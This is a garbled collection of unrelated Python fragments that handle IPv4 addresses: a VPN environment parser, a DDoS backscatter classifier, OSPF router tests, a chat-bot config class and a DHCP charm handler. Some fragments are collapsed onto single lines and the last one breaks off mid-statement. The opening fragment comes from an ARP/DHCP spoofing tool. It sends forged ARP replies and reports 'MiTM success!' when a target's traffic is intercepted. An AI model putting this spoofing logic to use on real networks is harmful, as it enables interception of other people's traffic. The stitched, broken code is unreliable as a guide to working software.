if request[DHCP].options[0][1] == 4: is_new_connection = True print Base.c_info + "DHCP DECLINE from: " + target_mac_address + " transaction id: " + hex( transaction_id) tm.add_task(discover_sender) if request.haslayer(ARP): if target_ip_address is not None: if request[ARP].op == 1: if request[Ether].dst == "ff:ff:ff:ff:ff:ff" and request[ ARP].hwdst == "00:00:00:00:00:00": print Base.c_info + "ARP request src MAC: " + request[ ARP].hwsrc + " dst IP: " + request[ARP].pdst if request[ ARP].pdst != target_ip_address or not is_new_connection: if not args.apple: arp_reply = arp.make_response( ethernet_src_mac=your_mac_address, ethernet_dst_mac=request[ARP].hwsrc, sender_mac=your_mac_address, sender_ip=request[ARP].pdst, target_mac=request[ARP].hwsrc, target_ip=request[ARP].psrc) SOCK.send(arp_reply) print Base.c_info + "Send ARP response!" else: arp_req_your_ip = True if request[Ether].dst == "ff:ff:ff:ff:ff:ff" and request[ ARP].pdst == router_ip_address: arp_req_router = True if arp_req_router or arp_req_your_ip: if not possible_output and not args.apple and not args.cisco and not args.new: try: print Base.c_warning + "Possible MiTM! Target: " + Base.cWARNING + \ target_ip_address + " (" + target_mac_address + ")" + Base.cEND possible_output = True except: pass if arp_req_router and arp_req_your_ip: if target_mac_address is not None and target_ip_address is not None: print Base.c_success + "MiTM success! Target: " + Base.cSUCCESS + target_ip_address + \ " (" + target_mac_address + ")" + Base.cEND if not args.not_exit: SOCK.close() exit(0) SOCK.close()
def ip(self, value):
    try:
        addr = IPv4Address(value)
        self._ip = addr
    except AddressValueError:
        raise MeboConfigurationError(
            f'Value {value} set for IP is invalid IPv4 Address')
def main(): # Process arguments and initialize TRAP interface try: args, _ = process_arguments() except SystemExit as e: args = None # Error in arguments or help message trap = pytrap.TrapCtx() try: trap.init(sys.argv, 1, 0, module_name="Backscatter classifier common TRAP help") # Allow trap to print it's own help but terminate script anyway due to error in arguments if args is None: sys.exit(PYTHON_ARGS_ERROR_EXIT) trap.setRequiredFmt(0) except Exception as e: # Trap error message print(e) sys.exit(TRAP_ARGS_ERROR_EXIT) # Logging settings logger = logging.getLogger("backscatter_classifier") logging.basicConfig( level=logging.DEBUG, filename=args.logfile, filemode='w', format= "[%(levelname)s], %(asctime)s, %(name)s, %(funcName)s, line %(lineno)d: %(message)s" ) # ASN and city databases try: geoip_db = Geoip2Wrapper(args.agp, args.cgp) except Exception as e: logger.error(e) logger.error("Error while create GeoIP2 wrapper") print(str(e), file=sys.stderr) sys.exit(EXIT_FAILURE) if args.export_to in ("c3isp", "c3isp-misp"): c3isp_upload.read_config(args.c3isp_config) if args.export_to == "misp": # MISP instance try: misp_instance = ExpandedPyMISP(args.url, args.key, args.ssl) except Exception as e: logger.error(e) logger.error("Error while creating MISP instance") print(str(e), file=sys.stderr) sys.exit(EXIT_FAILURE) # DDoS model ddos_model = pickle.load(args.model) ddos_classifier = DDoSClassifier(ddos_model, args.min_threshold) # *** MAIN PROCESSING LOOP *** while True: try: # Receive data try: data = trap.recv() except pytrap.FormatChanged as e: # Automatically detect format fmttype, fmtspec = trap.getDataFmt(0) rec = pytrap.UnirecTemplate(fmtspec) data = e.data if len(data) <= 1: # Terminating message break # Decode received data into python object rec.setData(data) # Only Ipv4 try: victim_ip = IPv4Address(rec.SRC_IP) except Exception as e: logger.info("Received IPv6 address, skipping") continue # Predict class of backscatter like traffic try: duration = DDoSClassifier.DURATION(rec) if duration < args.min_duration: # attack is too short lived to be reported continue if duration > args.max_duration: # attack is too long continue if rec.FLOW_COUNT < args.min_flows: # attack does not have enough flows continue for subnet in CESNET_NET: if victim_ip in subnet: continue ddos = ddos_classifier.predict(rec) except Exception as e: logger.error(e) continue # Report attack using MISP try: if ddos: try: domain = gethostbyaddr(str(victim_ip)) except herror as e: # Do not report for unknown domains continue event = create_ddos_event(rec, geoip_db, victim_ip, domain[0], args.misp_templates_dir) if args.export_to == "misp": try: event_id = misp_instance.add_event( event)['Event']['id'] misp_instance.publish(event_id) except Exception as e: logger.error(e) elif args.export_to in ("c3isp", "c3isp-misp"): logger.debug(f"Uploading event to C3ISP platform.") event_file_path = Path( "misp_event_to_c3isp.json").absolute() with temporary_open(event_file_path, 'w') as event_file: json.dump(event.to_json(), event_file) response = c3isp_upload.upload_to_c3isp( event_file_path) logger.debug(f"Response: {response}") if not response or ('status' in response and response['status'] == 'ERROR'): logger.error("ERROR during upload!") continue if args.export_to == "c3isp-misp": dpo_id = response['content'][ 'additionalProperties']['dposId'] logger.debug(f'Exporting DPO {dpo_id} to MISP.') c3isp_upload.export_misp(dpo_id, logger) except Exception as e: logger.error(str(e)) continue except Exception as e: # Log and re-raise 
exception logger.error(e) raise e # *** END OF MAIN PROCESSING LOOP *** trap.finalize()
Terminated: 1 2 3 Packet-mode: 11 22 33 Forwarded (F): 1 2 3 Discarded (terminated): 1 Denied (terminated): 1 --------------------------------------------------------------- Total: 11 40 70 """ SHOW_FLOWS_ALL_PARSED_DICT = { 'flows_list': [{ 'app': 'UDPv4', 'destination ip': IPv4Address('10.190.5.2'), 'destination port': 1003, 'reduction': 99, 'since': { 'day': '10', 'hour': '23', 'min': '58', 'month': '02', 'secs': '01', 'year': '2014' }, 'source ip': IPv4Address('10.190.0.1'), 'source port': 406, 'type': 'N' }, { 'app': 'SRDF_V2',
def _decode(self, obj, context, path):
    return IPv4Address(obj)
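The one-line _decode above works because IPv4Address accepts, besides dotted strings, both a 4-byte packed value and a plain integer; a quick standard-library illustration:

from ipaddress import IPv4Address

print(IPv4Address(b"\xc0\xa8\x01\x01"))   # 192.168.1.1  (packed bytes)
print(IPv4Address(3232235777))            # 192.168.1.1  (integer form)
print(IPv4Address("192.168.1.1").packed)  # b'\xc0\xa8\x01\x01'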
def test_ospf_p2p_tc3_p0(request): """OSPF IFSM -Verify state change events on p2p network.""" tc_name = request.node.name write_test_header(tc_name) tgen = get_topogen() # Don't run this test if we have any failure. if tgen.routers_have_failure(): pytest.skip(tgen.errors) global topo step("Bring up the base config as per the topology") reset_config_on_routers(tgen) step("Verify that OSPF is subscribed to multi cast services " "(All SPF, all DR Routers).") step("Verify that interface is enabled in ospf.") step("Verify that config is successful.") dut = "r0" input_dict = { "r0": { "links": { "r3": { "ospf": { "mcastMemberOspfAllRouters": True, "ospfEnabled": True } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) step("Delete the ip address") topo1 = { "r0": { "links": { "r3": { "ipv4": topo["routers"]["r0"]["links"]["r3"]["ipv4"], "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "delete": True, } } } } result = create_interfaces_cfg(tgen, topo1) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) step("Change the ip on the R0 interface") topo_modify_change_ip = deepcopy(topo) intf_ip = topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] = str( IPv4Address(frr_unicode(intf_ip.split("/")[0])) + 3) + "/{}".format( intf_ip.split("/")[1]) build_config_from_json(tgen, topo_modify_change_ip, save_bkup=False) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "r3": { "ospf": { "ipAddress": topo_modify_change_ip["routers"]["r0"]["links"]["r3"] ["ipv4"].split("/")[0], "ipAddressPrefixlen": int(topo_modify_change_ip["routers"]["r0"]["links"] ["r3"]["ipv4"].split("/")[1]), } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) step("Modify the mask on the R0 interface") ip_addr = topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] mask = topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] step("Delete the ip address") topo1 = { "r0": { "links": { "r3": { "ipv4": ip_addr, "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "delete": True, } } } } result = create_interfaces_cfg(tgen, topo1) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) step("Change the ip on the R0 interface") topo_modify_change_ip = deepcopy(topo) intf_ip = topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] = str( IPv4Address(frr_unicode(intf_ip.split("/")[0])) + 3) + "/{}".format(int(intf_ip.split("/")[1]) + 1) build_config_from_json(tgen, topo_modify_change_ip, save_bkup=False) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "r3": { "ospf": { "ipAddress": topo_modify_change_ip["routers"]["r0"]["links"]["r3"] ["ipv4"].split("/")[0], "ipAddressPrefixlen": int(topo_modify_change_ip["routers"]["r0"]["links"] ["r3"]["ipv4"].split("/")[1]), } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) topo1 = { "r0": { "links": { "r3": { "ipv4": topo_modify_change_ip["routers"]["r0"]["links"]["r3"] ["ipv4"], "interface": 
topo_modify_change_ip["routers"]["r0"]["links"]["r3"] ["interface"], "delete": True, } } } } result = create_interfaces_cfg(tgen, topo1) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) build_config_from_json(tgen, topo, save_bkup=False) step("Change the area id on the interface") input_dict = { "r0": { "links": { "r3": { "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "ospf": { "area": "0.0.0.0" }, "delete": True, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format( tc_name, result) input_dict = { "r0": { "links": { "r3": { "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "ospf": { "area": "0.0.0.1" }, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format( tc_name, result) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "r3": { "ospf": { "area": "0.0.0.1", "ospfEnabled": True } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) input_dict = { "r0": { "links": { "r3": { "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "ospf": { "area": "0.0.0.1" }, "delete": True, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format( tc_name, result) input_dict = { "r0": { "links": { "r3": { "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "ospf": { "area": "0.0.0.0" }, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format( tc_name, result) # Api call verify whether BGP is converged ospf_covergence = verify_ospf_neighbor(tgen, topo) assert ospf_covergence is True, "setup_module :Failed \n Error:" " {}".format( ospf_covergence) write_test_footer(tc_name)
    ('vpnfd', 'VPNFD', int),  # set if OpenConnect invoked in --script-tun/ocproxy mode
    ('gateway', 'VPNGATEWAY', ip_address),
    ('tundev', 'TUNDEV', str),
    ('domain', 'CISCO_DEF_DOMAIN', lambda x: x.split(), []),
    ('splitdns', 'CISCO_SPLIT_DNS', lambda x: x.split(','), []),
    ('banner', 'CISCO_BANNER', str),
    ('myaddr', 'INTERNAL_IP4_ADDRESS', IPv4Address),      # a.b.c.d
    ('mtu', 'INTERNAL_IP4_MTU', int),
    ('netmask', 'INTERNAL_IP4_NETMASK', IPv4Address),     # a.b.c.d
    ('netmasklen', 'INTERNAL_IP4_NETMASKLEN', int),
    ('network', 'INTERNAL_IP4_NETADDR', IPv4Address),     # a.b.c.d
    ('dns', 'INTERNAL_IP4_DNS', lambda x: [ip_address(x) for x in x.split()], []),
    ('nbns', 'INTERNAL_IP4_NBNS', lambda x: [IPv4Address(x) for x in x.split()], []),
    ('myaddr6', 'INTERNAL_IP6_ADDRESS', IPv6Interface),   # x:y::z or x:y::z/p
    ('netmask6', 'INTERNAL_IP6_NETMASK', IPv6Interface),  # x:y:z:: or x:y::z/p
    ('dns6', 'INTERNAL_IP6_DNS', lambda x: [ip_address(x) for x in x.split()], []),
    ('nsplitinc', 'CISCO_SPLIT_INC', int, 0),
    ('nsplitexc', 'CISCO_SPLIT_EXC', int, 0),
    ('nsplitinc6', 'CISCO_IPV6_SPLIT_INC', int, 0),
    ('nsplitexc6', 'CISCO_IPV6_SPLIT_EXC', int, 0),
    ('idle_timeout', 'IDLE_TIMEOUT', int, 600),           # OpenConnect v8.06+
    ('vpnpid', 'VPNPID', int),                            # OpenConnect v9.0+
]


def parse_env(environ=os.environ):
    global vpncenv
def configure(): hookenv.log('Configuring isc-dhcp') managed_network = IPv4Network(config()["managed-network"]) # We know what network we should be managing. This IPNetwork object has the # following properties: # .ip # Original ip from config value # .network # network ip # .netmmask # .broadcast_address # # What we don't know is what interface this network is connected to. The # following code tries to find out: # 1. what interface is connected to that network # 2. what the ip is of that interface # 3. what other interfaces we have, ie interfaces that are unmanaged. # 4. what our public ip is # # Then we do two sanity checks: the broadcast and netmask of that interface # must be the same as for the managed network. # mn_iface = None mn_iface_ip = None unmanaged_ifs = [] public_ip = None for interface in netifaces.interfaces(): af_inet = netifaces.ifaddresses(interface).get(AF_INET) if af_inet and af_inet[0].get('broadcast'): addr = IPv4Address( netifaces.ifaddresses(interface)[AF_INET][0]['addr']) if not addr.is_private: # Can't use is_global in 14.04 because of: https://bugs.python.org/issue21386 # We found #4! public_ip = str(addr) public_if = interface if addr in managed_network: # We found #1 and #2 ! mn_iface = interface mn_iface_ip = str(addr) # Sanity check assert (str(managed_network.broadcast_address) == netifaces. ifaddresses(interface)[AF_INET][0]['broadcast']) assert (str(managed_network.netmask) == netifaces.ifaddresses( interface)[AF_INET][0]['netmask']) else: # to find #3 unmanaged_ifs.append(interface) if not public_ip: # No public ip found, so we'll use the address of the interface # that is used to connect to the internet. public_ip = get_gateway_source_ip() if not mn_iface: # We are not connected to the network we have to manage. We don't know # what to do in this case so just tell that to the admin. We know this # handler will rerun when the config changes. hookenv.status_set( 'blocked', 'Cannot find interface that is connected to network {}.'.format( managed_network)) return # Now that we know what interface we have to manage, let's check if there is # a dhcp server responding to requests from that interface. If there is no # dhcp server, we should install one. output = subprocess.check_output( ['nmap', '--script', 'broadcast-dhcp-discover', '-S', mn_iface_ip], stderr=subprocess.STDOUT, universal_newlines=True) print(output) if 'DHCPOFFER' in output: # pylint: disable=E1135 print('DHCP server found on this network. Will NOT create one.') remove_state('role.dhcp-server') else: print('No DHCP server found on this network, will create one.') set_state('role.dhcp-server') # Configure ourselves as a NAT gateway regardless of network topology so # port-forwarding always works. configure_nat_gateway(mn_iface, [public_if]) # If our default gateway is not part of the managed network then we must # tell the clients on the managed network that we are their default gateway. # Otherwise, just pass our default gateway to the clients. gateway_if, gateway_ip = get_gateway() if gateway_if != mn_iface: print( 'Default gateway is NOT in the managed network so we tell potential clients we are their default gateway.' ) gateway_ip = mn_iface_ip else: print( 'Default gateway is on the managed network so we pass our default gateway to potential clients.' ) # Save these values so other handlers can use them. kv = unitdata.kv() kv.set('mn.iface', mn_iface) kv.set('mn.iface-ip', mn_iface_ip) kv.set('mn.gateway', gateway_ip) kv.set('public-ip', public_ip) # PS: opened-ports uses this value too. 
set_state('gateway.installed') # Now we let the dhcp-server handlers know that they potentially have to # reconfigure their settings. remove_state('dhcp-server.configured')
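A standalone sketch (hypothetical addresses) of the two ipaddress operations the handler above relies on: the membership test that locates the managed interface and the broadcast/netmask attributes used in the sanity checks.

from ipaddress import IPv4Address, IPv4Network

managed_network = IPv4Network("192.168.10.0/24")  # hypothetical config value
addr = IPv4Address("192.168.10.14")               # hypothetical interface address

print(addr in managed_network)            # True  -> this is the managed interface
print(managed_network.broadcast_address)  # 192.168.10.255
print(managed_network.netmask)            # 255.255.255.0
print(addr.is_private)                    # True  -> not selected as public_ip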
def parse_env(environ=os.environ): global vpncenv env = slurpy() for var, envar, maker, *default in vpncenv: if envar in environ: try: val = maker(environ[envar]) except Exception as e: print( 'Exception while setting %s from environment variable %s=%r' % (var, envar, environ[envar]), file=stderr) raise elif default: val, = default else: val = None if var is not None: env[var] = val # IPv4 network is the combination of the network address (e.g. 192.168.0.0) and the netmask (e.g. 255.255.0.0) if env.network: orig_netaddr = env.network env.network = IPv4Network( env.network).supernet(new_prefix=env.netmasklen) if env.network.network_address != orig_netaddr: print( "WARNING: IPv4 network %s/%d has host bits set, replacing with %s" % (orig_netaddr, env.netmasklen, env.network), file=stderr) assert env.network.netmask == env.netmask, \ "IPv4 network (INTERNAL_IP4_{{NETADDR,NETMASK}}) {ad}/{nm} does not match INTERNAL_IP4_NETMASKLEN={nml} (implies /{nmi})".format( ad=orig_netaddr, nm=env.netmask, nml=env.netmasklen, nmi=env.network.netmask) assert env.network.netmask == env.netmask # Need to match behavior of original vpnc-script here # Examples: # 1) INTERNAL_IP6_ADDRESS=fe80::1, INTERNAL_IP6_NETMASK=fe80::/64 => interface of fe80::1/64, network of fe80::/64 # 2) INTERNAL_IP6_ADDRESS=unset, INTERNAL_IP6_NETMASK=fe80::1/64 => interface of fe80::1/64, network of fe80::/64 # 3) INTERNAL_IP6_ADDRESS=2000::1, INTERNAL_IP6_NETMASK=unset => interface of 2000::1/128, network of 2000::1/128 if env.myaddr6 or env.netmask6: if not env.netmask6: env.netmask6 = IPv6Network(env.myaddr6) # case 3 above, /128 env.myaddr6 = IPv6Interface(env.netmask6) env.network6 = env.myaddr6.network else: env.myaddr6 = None env.network6 = None env.myaddrs = list(filter(None, (env.myaddr, env.myaddr6))) # Handle splits env.splitinc = [] env.splitexc = [] for pfx, n in chain((('INC', n) for n in range(env.nsplitinc)), (('EXC', n) for n in range(env.nsplitexc))): ad = IPv4Address(environ['CISCO_SPLIT_%s_%d_ADDR' % (pfx, n)]) nm = IPv4Address(environ['CISCO_SPLIT_%s_%d_MASK' % (pfx, n)]) nml = int(environ['CISCO_SPLIT_%s_%d_MASKLEN' % (pfx, n)]) net = IPv4Network(ad).supernet(new_prefix=nml) if net.network_address != ad: print( "WARNING: IPv4 split network (CISCO_SPLIT_%s_%d_{ADDR,MASK}) %s/%d has host bits set, replacing with %s" % (pfx, n, ad, nml, net), file=stderr) assert net.netmask == nm, \ "IPv4 split network (CISCO_SPLIT_{pfx}_{n}_{{ADDR,MASK}}) {ad}/{nm} does not match CISCO_SPLIT_{pfx}_{n}_MASKLEN={nml} (implies /{nmi})".format( pfx=pfx, n=n, ad=ad, nm=nm, nml=nml, nmi=net.netmask) env['split' + pfx.lower()].append(net) for pfx, n in chain((('INC', n) for n in range(env.nsplitinc6)), (('EXC', n) for n in range(env.nsplitexc6))): ad = IPv6Address(environ['CISCO_IPV6_SPLIT_%s_%d_ADDR' % (pfx, n)]) nml = int(environ['CISCO_IPV6_SPLIT_%s_%d_MASKLEN' % (pfx, n)]) net = IPv6Network(ad).supernet(new_prefix=nml) if net.network_address != ad: print( "WARNING: IPv6 split network (CISCO_IPV6_SPLIT_%s_%d_{ADDR,MASKLEN}) %s/%d has host bits set, replacing with %s" % (pfx, n, ad, nml, net), file=stderr) env['split' + pfx.lower()].append(net) return env
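The netmask assertions above reduce to one standard-library relation; a small sketch with hypothetical values showing how a dotted netmask is cross-checked against a prefix length:

from ipaddress import IPv4Address, IPv4Network

netaddr = IPv4Address("10.11.0.0")    # e.g. INTERNAL_IP4_NETADDR
netmask = IPv4Address("255.255.0.0")  # e.g. INTERNAL_IP4_NETMASK
netmasklen = 16                       # e.g. INTERNAL_IP4_NETMASKLEN

# Build the network from address + prefix length, then compare its netmask
# with the dotted mask; a mismatch means the three values are inconsistent.
network = IPv4Network(netaddr).supernet(new_prefix=netmasklen)
assert network.netmask == netmask, "netmask does not match prefix length"
print(network)  # 10.11.0.0/16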
class Config(BaseConfig): """ NoneBot 主要配置。大小写不敏感。 除了 NoneBot 的配置项外,还可以自行添加配置项到 ``.env.{environment}`` 文件中。 这些配置将会在 json 反序列化后一起带入 ``Config`` 类中。 """ # nonebot configs driver: str = "nonebot.drivers.fastapi" """ - 类型: ``str`` - 默认值: ``"nonebot.drivers.fastapi"`` - 说明: NoneBot 运行所使用的 ``Driver`` 。继承自 ``nonebot.driver.BaseDriver`` 。 """ host: IPvAnyAddress = IPv4Address("127.0.0.1") # type: ignore """ - 类型: ``IPvAnyAddress`` - 默认值: ``127.0.0.1`` - 说明: NoneBot 的 HTTP 和 WebSocket 服务端监听的 IP/主机名。 """ port: int = 8080 """ - 类型: ``int`` - 默认值: ``8080`` - 说明: NoneBot 的 HTTP 和 WebSocket 服务端监听的端口。 """ debug: bool = False """ - 类型: ``bool`` - 默认值: ``False`` - 说明: 是否以调试模式运行 NoneBot。 """ # bot connection configs api_root: Dict[str, str] = {} """ - 类型: ``Dict[str, str]`` - 默认值: ``{}`` - 说明: 以机器人 ID 为键,上报地址为值的字典,环境变量或文件中应使用 json 序列化。 - 示例: .. code-block:: default API_ROOT={"123456": "http://127.0.0.1:5700"} """ api_timeout: Optional[float] = 30. """ - 类型: ``Optional[float]`` - 默认值: ``30.`` - 说明: API 请求超时时间,单位: 秒。 """ access_token: Optional[str] = None """ - 类型: ``Optional[str]`` - 默认值: ``None`` - 说明: API 请求以及上报所需密钥,在请求头中携带。 - 示例: .. code-block:: http POST /cqhttp/ HTTP/1.1 Authorization: Bearer kSLuTF2GC2Q4q4ugm3 """ secret: Optional[str] = None """ - 类型: ``Optional[str]`` - 默认值: ``None`` - 说明: HTTP POST 形式上报所需签名,在请求头中携带。 - 示例: .. code-block:: http POST /cqhttp/ HTTP/1.1 X-Signature: sha1=f9ddd4863ace61e64f462d41ca311e3d2c1176e2 """ # bot runtime configs superusers: Set[int] = set() """ - 类型: ``Set[int]`` - 默认值: ``set()`` - 说明: 机器人超级用户。 - 示例: .. code-block:: default SUPER_USERS=[12345789] """ nickname: Union[str, Set[str]] = "" """ - 类型: ``Union[str, Set[str]]`` - 默认值: ``""`` - 说明: 机器人昵称。 """ command_start: Set[str] = {"/"} """ - 类型: ``Set[str]`` - 默认值: ``{"/"}`` - 说明: 命令的起始标记,用于判断一条消息是不是命令。 """ command_sep: Set[str] = {"."} """ - 类型: ``Set[str]`` - 默认值: ``{"."}`` - 说明: 命令的分隔标记,用于将文本形式的命令切分为元组(实际的命令名)。 """ session_expire_timeout: timedelta = timedelta(minutes=2) """ - 类型: ``timedelta`` - 默认值: ``timedelta(minutes=2)`` - 说明: 等待用户回复的超时时间。 - 示例: .. code-block:: default SESSION_EXPIRE_TIMEOUT=120 # 单位: 秒 SESSION_EXPIRE_TIMEOUT=[DD ][HH:MM]SS[.ffffff] SESSION_EXPIRE_TIMEOUT=P[DD]DT[HH]H[MM]M[SS]S # ISO 8601 """ apscheduler_config: dict = {"apscheduler.timezone": "Asia/Shanghai"} """ - 类型: ``dict`` - 默认值: ``{"apscheduler.timezone": "Asia/Shanghai"}`` - 说明: APScheduler 的配置对象,见 `Configuring the Scheduler`_ .. _Configuring the Scheduler: https://apscheduler.readthedocs.io/en/latest/userguide.html#configuring-the-scheduler """ # custom configs # custom configs can be assigned during nonebot.init # or from env file using json loads class Config: extra = "allow" env_file = ".env.prod"
def test_ospf_lan_tc1_p0(request): """ OSPF Hello protocol - Verify DR BDR Elections """ tc_name = request.node.name write_test_header(tc_name) tgen = get_topogen() # Don't run this test if we have any failure. if tgen.routers_have_failure(): pytest.skip(tgen.errors) global topo step("Bring up the base config as per the topology") reset_config_on_routers(tgen) step("Verify that DR BDR DRother are elected in the LAN.") input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "DR"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r0" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step( "Verify that all the routers are in FULL state with DR and BDR " "in the topology" ) input_dict = { "r1": { "ospf": { "neighbors": { "r0": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r1" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step( "Configure DR pririty 100 on R0 and clear ospf neighbors " "on all the routers." ) input_dict = { "r0": { "links": { "s1": { "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"priority": 100}, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) step("Clear ospf neighbours in all routers") for rtr in ["r0", "r1", "r2", "r3"]: clear_ospf(tgen, rtr) step("Verify that DR election is triggered and R0 is elected as DR") input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r0" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step( "Configure DR pririty 150 on R0 and clear ospf neighbors " "on all the routers." 
) input_dict = { "r0": { "links": { "s1": { "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"priority": 150}, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) step("Clear ospf neighbours in all routers") for rtr in ["r0", "r1"]: clear_ospf(tgen, rtr) step("Verify that DR election is triggered and R0 is elected as DR") input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r0" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Configure DR priority 0 on R0 & Clear ospf nbrs on all the routers") input_dict = { "r0": { "links": { "s1": { "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"priority": 0}, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) step("Clear ospf neighbours in all routers") for rtr in ["r1"]: clear_ospf(tgen, rtr) step("Verify that DR election is triggered and R0 is elected as DRother") input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "DR"}, "r2": {"state": "2-Way", "role": "DROther"}, "r3": {"state": "2-Way", "role": "DROther"}, } } } } dut = "r0" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step( "Configure DR priority to default on R0 and Clear ospf neighbors" " on all the routers" ) input_dict = { "r0": { "links": { "s1": { "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"priority": 100}, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) step("Clear ospf neighbours in all routers") for rtr in ["r0", "r1"]: clear_ospf(tgen, rtr) step("Verify that DR election is triggered and R0 is elected as DR") input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r0" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Shut interface on R0") dut = "r0" intf = topo["routers"]["r0"]["links"]["s1"]["interface"] shutdown_bringup_interface(tgen, dut, intf, False) result = verify_ospf_neighbor(tgen, topo, dut, lan=True, expected=False) assert result is not True, "Testcase {} : Failed \n Error: {}".format( tc_name, result ) step("No Shut interface on R0") dut = "r0" intf = topo["routers"]["r0"]["links"]["s1"]["interface"] shutdown_bringup_interface(tgen, dut, intf, True) input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "DR"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } step("Verify that after no shut ospf neighbours are full on R0.") result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Clear ospf on DR router in the topology.") clear_ospf(tgen, "r0") step("Verify that BDR is getting promoted to DR after clear.") step("Verify that all the nbrs are in 
FULL state with the elected DR.") result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Change the ip on LAN intf on R0 to other ip from the same subnet.") topo_modify_change_ip = deepcopy(topo) intf_ip = topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] = str( IPv4Address(unicode(intf_ip.split("/")[0])) + 3 ) + "/{}".format(intf_ip.split("/")[1]) build_config_from_json(tgen, topo_modify_change_ip, save_bkup=False) step( "Verify that OSPF is in FULL state with other routers with " "newly configured IP." ) result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Change the ospf router id on the R0 and clear ip ospf interface.") change_rid = {"r0": {"ospf": {"router_id": "100.1.1.100"}}} result = create_router_ospf(tgen, topo, change_rid) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) topo["routers"]["r0"]["ospf"]["router_id"] = "100.1.1.100" step("Reload the FRR router") stop_router(tgen, "r0") start_router(tgen, "r0") step( "Verify that OSPF is in FULL state with other routers with" " newly configured router id." ) input_dict = { "r1": { "ospf": { "neighbors": { "r0": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": 